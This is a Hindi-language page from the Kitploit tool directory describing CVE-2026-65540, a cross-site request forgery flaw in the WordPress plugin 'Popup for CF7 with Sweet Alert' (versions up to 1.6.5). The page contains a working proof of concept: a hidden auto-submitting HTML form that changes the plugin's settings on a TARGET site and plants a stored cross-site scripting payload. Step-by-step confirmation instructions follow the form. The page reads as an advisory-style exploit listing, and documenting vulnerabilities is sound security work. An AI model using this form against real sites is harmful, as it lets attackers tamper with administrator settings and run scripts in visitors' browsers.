Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-65540 — Popup for CF7 with Sweet Alert <= 1.6.5 - क्रॉस-साइट रिक्वेस्ट फ़ॉर्जरी | Kitploit
उपकरण/GitHubGitHub/testardou/cve-2026-65540
वेब भेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षा
GitHubtestardou/cve-2026-65540

CVE-2026-65540

Popup for CF7 with Sweet Alert <= 1.6.5 - क्रॉस-साइट रिक्वेस्ट फ़ॉर्जरी

रिपॉजिटरी देखें
14घं 34मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-65540

CF7 के लिए पॉपअप Sweet Alert के साथ <= 1.6.5 - क्रॉस-साइट रिक्वेस्ट फ़ॉर्जरी

प्लगइन URL

https://wordpress.org/plugins/cf7-sweet-alert-popup/

विवरण

प्लगइन के सेटिंग्स हैंडलर में इसके nonce सत्यापन में एक लॉजिक त्रुटि है जो सभी CSRF सुरक्षा को अक्षम कर देती है। एक अनधिकृत हमलावर एक प्रमाणित प्रशासक को छिपे हुए स्वतः-सबमिटिंग फ़ॉर्म वाले दुर्भावनापूर्ण पृष्ठ पर जाने के लिए धोखा देकर इसका फायदा उठा सकता है, और मनमाने ढंग से प्लगइन सेटिंग्स को संशोधित कर सकता है। सबमिट किए गए मान बिना सैनिटाइज़ेशन के संग्रहीत किए जाते हैं और wp_head के माध्यम से प्रत्येक फ्रंटएंड पृष्ठ पर एक

POC

  1. निम्नलिखित HTML पृष्ठ को एक अलग सर्वर पर होस्ट करें:
root@kitploit:~
<!DOCTYPE html>
<html>
<body>
<h1>Hello</h1>

<form style="visibility:hidden" action="http://TARGET/wp-admin/admin.php?page=cf7-simplepopup"
      method="POST" id="csrf" target="hiddenframe">
  <input name="cf7simplePopupWidth" value="500;alert(document.domain)">
  <input name="cf7simplePopupNonce" value="invalid_nonce">
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>
  1. WordPress में एक प्रशासक के रूप में लॉग इन करें
  • दुर्भावनापूर्ण पृष्ठ पर जाएँ
  • (वैकल्पिक) http://TARGET/wp-admin/admin.php?page=cf7-simplepopup पर जाएँ — पुष्टि करें कि Width फ़ील्ड में अब 500;alert(document.domain) है
  • किसी भी फ्रंटएंड पृष्ठ पर जाएँ — ब्राउज़र में alert(document.domain) निष्पादित होता है जो संग्रहीत XSS की पुष्टि करता है
  • टूल डाउनलोड करें